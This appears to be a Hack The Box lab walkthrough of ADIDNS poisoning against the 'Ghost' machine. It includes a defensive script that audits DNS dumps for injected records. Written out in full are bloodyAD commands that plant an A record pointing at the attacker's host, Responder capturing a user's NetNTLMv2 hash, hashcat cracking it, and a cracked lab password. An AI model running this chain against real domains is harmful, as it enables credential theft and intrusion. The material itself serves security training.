ADIDNS Poisoning


Following up on the enumeration of the intranet forum, it would appear that the justin.bradley user is executing a script against the bitbucket.ghost.htb virtual host / sub-domain.

ADIDNS Poisoning is a cyberattack where an attacker, often after compromising an Active Directory (AD) user account, manipulates DNS records in an AD-integrated DNS system.

In an Active Directory environment with dynamic DNS updates enabled, regular AD users may have the ability to add DNS records to the ADIDNS system. This feature is often used for ease of management but can also be leveraged by a threat actor who gains access to a user account, allowing them to manipulate DNS records, potentially leading to data exfiltration, disruption of network operations, or facilitating further attacks within the AD domain. Proper access controls, monitoring, and auditing are crucial to mitigate this security risk.

The ADIDNS zone DACL (Discretionary Access Control List) allows regular users to create child objects by default, and attackers can leverage that to hijack traffic. ADIDNS zones can therefore be remotely edited in the following ways:

  • with dynamic updates (a DNS specific protocol used by machine accounts to add and update their own DNS records). Users can create records if they don’t exist, and they will have full control over it. By default, users that don’t own a record will not be able to edit it, or to add another one with the same name, even if the type is different (A, AAAA, CNAME, MX, and so on).
  • by using LDAP to create dnsNode objects. While dynamic updates can’t be used to inject a wildcard DNS record, LDAP can be (only if the record doesn’t already exist, which is the case by default).
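The two edit paths above also describe what a defender should be looking for in the zone: records that appeared without a matching machine account, wildcard records, and records whose data points outside the organisation's own address space. The following script is an added example and is not part of this write-up or of bloodyAD; it parses the text layout printed by `bloodyAD ... get dnsDump --no-detail` (blocks of `recordName:` followed by `<TYPE>: <data>` lines, as shown later on this page), diffs a current dump against an earlier baseline dump, and flags the three conditions. Both dumps and the `ALLOWED_RANGES` list are constructed sample data; the 10.10.11.0/24 range is an assumption standing in for the real internal address plan.

```python
"""
Audit an ADIDNS zone dump for signs of record injection.

Added example (not from the original write-up). Parses the text
layout shown by `bloodyAD ... get dnsDump --no-detail` and flags:
  * records that did not exist in an earlier baseline dump,
  * wildcard records (recordName beginning with "*."), and
  * A/AAAA records whose address lies outside the allowed ranges.
The dumps and the allowed ranges below are constructed sample data.
"""
import ipaddress
from typing import Dict, List, Tuple

# Constructed: an earlier dump of the zone, taken before the incident.
BASELINE_DUMP = """\
recordName: dc01.ghost.htb
A: 10.10.11.24

recordName: ghost.htb
A: 10.10.11.24
NS: dc01.ghost.htb.
"""

# Constructed: a later dump with an injected A record and a wildcard.
CURRENT_DUMP = """\
recordName: dc01.ghost.htb
A: 10.10.11.24

recordName: ghost.htb
A: 10.10.11.24
NS: dc01.ghost.htb.

recordName: bitbucket.ghost.htb
A: 10.10.14.61

recordName: *.ghost.htb
A: 10.10.14.61
"""

# Assumption: the organisation's address space; anything else is suspicious.
ALLOWED_RANGES = [ipaddress.ip_network("10.10.11.0/24")]

Record = Tuple[str, str]  # (record type, record data)


def parse_dns_dump(text: str) -> Dict[str, List[Record]]:
    """Return {recordName: [(type, data), ...]} from dnsDump-style text."""
    records: Dict[str, List[Record]] = {}
    name = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("["):
            continue  # blank separators and "[...REDACTED...]" markers
        # partition() splits at the first colon only, so IPv6 data survives
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "recordName":
            name = value
            records.setdefault(name, [])
        elif name is not None:
            records[name].append((key.upper(), value))
    return records


def address_allowed(addr: str) -> bool:
    """True if addr is inside ALLOWED_RANGES (or is not an IP address at all)."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return True  # e.g. an NS/CNAME target; no range check applies
    return any(ip in net for net in ALLOWED_RANGES)


def audit_dns_dump(baseline_text: str, current_text: str) -> List[str]:
    """Return one finding per suspicious record in the current dump."""
    baseline = parse_dns_dump(baseline_text)
    current = parse_dns_dump(current_text)
    findings: List[str] = []
    for name, recs in sorted(current.items()):
        if name not in baseline:
            findings.append(f"NEW: {name} not in baseline")
        if name.startswith("*."):
            findings.append(f"WILDCARD: {name}")
        for rtype, data in recs:
            if rtype in ("A", "AAAA") and not address_allowed(data):
                findings.append(f"EXTERNAL: {name} {rtype} {data}")
    return findings


if __name__ == "__main__":
    for finding in audit_dns_dump(BASELINE_DUMP, CURRENT_DUMP):
        print(finding)
```

Run against the constructed dumps, the script reports the injected bitbucket record twice (new, and pointing outside the allowed range) and the wildcard three times. In practice the baseline would be a dump scheduled from a privileged account, and a record whose owner is a plain user rather than a machine account is the next attribute worth checking once the detailed dump is available.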

While there are many tools available for such operations, krbrelayx-dnstool and BloodyAD seem the most reliable.

Adding a Malicious DNS record


┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=intranet_principal@dc01.ghost.htb.ccache bloodyAD -d GHOST.HTB -k --host dc01.ghost.htb add dnsRecord --dnstype A bitbucket 10.10.14.61
 
[+] bitbucket has been successfully updated

Using the TGT of the intranet_principal account, I can use bloodyAD to add an arbitrary DNS A record, bitbucket, with its data set to the IP address of Kali. Only the intranet_principal account has access.

┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=intranet_principal@dc01.ghost.htb.ccache bloodyAD -d GHOST.HTB -k --host dc01.ghost.htb get dnsDump --no-detail                
 
[...REDACTED...]
 
recordName: bitbucket.ghost.htb
A: 10.10.14.61
 
[...REDACTED...]

The dnsDump output confirms that the record now exists in the zone.

Capture the Hash


┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ nnc 80  
listening on [any] 80 ...
connect to [10.10.14.61] from (UNKNOWN) [10.10.11.24] 63651
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.20348.2582
Host: bitbucket.ghost.htb
Connection: Keep-Alive

As expected, there is an inbound HTTP connection from 10.10.11.24 with the Host header set to bitbucket.ghost.htb, which now resolves to Kali.

┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ sudo responder -I tun0 --disable-ess --lm -v
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|
 
           NBT-NS, LLMNR & MDNS Responder 3.1.4.0
 
  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder
 
  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C
 
 
[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]
 
[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [ON]
 
[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]
 
[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [ON]
    Force ESS downgrade        [ON]
 
[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.61]
    Responder IPv6             [dead:beef:2::103b]
    Challenge set              [1122334455667788]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
 
[+] Current Session Variables:
    Responder Machine Name     [WIN-0S6AW9SVBRA]
    Responder Domain Name      [CUXO.LOCAL]
    Responder DCE-RPC Port     [46423]
 
[+] Listening for events...
 
[HTTP] Sending NTLM authentication request to 10.10.11.24
[HTTP] GET request from: ::ffff:10.10.11.24  URL: / 
[HTTP] NTLMv2 Client   : 10.10.11.24
[HTTP] NTLMv2 Username : ghost\justin.bradley
[HTTP] NTLMv2 Hash     : justin.bradley::ghost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

Using Responder, I can capture the inbound NTLM authentication (a NetNTLMv2 challenge-response) from the justin.bradley user.

I will save the hash into a file, justin.bradley.hash.

Password-Cracking


┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ hashcat -a 0 -m 5600 justin.bradley.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Host memory required for this attack: 1 MB
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
 
JUSTIN.BRADLEY::ghost:1122334455667788:5a65e6bfaa7b9976ad126178704ff6e6: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:Qwertyuiop1234$$
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: JUSTIN.BRADLEY::ghost:1122334455667788:5a65e6bfaa7b...000000
Time.Started.....: Wed Jul 17 18:33:14 2024 (5 secs)
Time.Estimated...: Wed Jul 17 18:33:19 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2008.5 kH/s (0.85ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10712064/14344386 (74.68%)
Rejected.........: 0/10712064 (0.00%)
Restore.Point....: 10708992/14344386 (74.66%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: R3047554 -> QXX988SCJH
Hardware.Mon.#1..: Util: 45%
 
Started: Wed Jul 17 18:33:00 2024
Stopped: Wed Jul 17 18:33:20 2024

The password hash is cracked for the justin.bradley user. The cracked password is Qwertyuiop1234$$.

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ impacket-getTGT GHOST.HTB/justin.bradley@dc01.ghost.htb -dc-ip $IP   
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Password: Qwertyuiop1234$$
[*] Saving ticket in justin.bradley@dc01.ghost.htb.ccache

A TGT is successfully generated for the justin.bradley user with the cracked password, which validates it.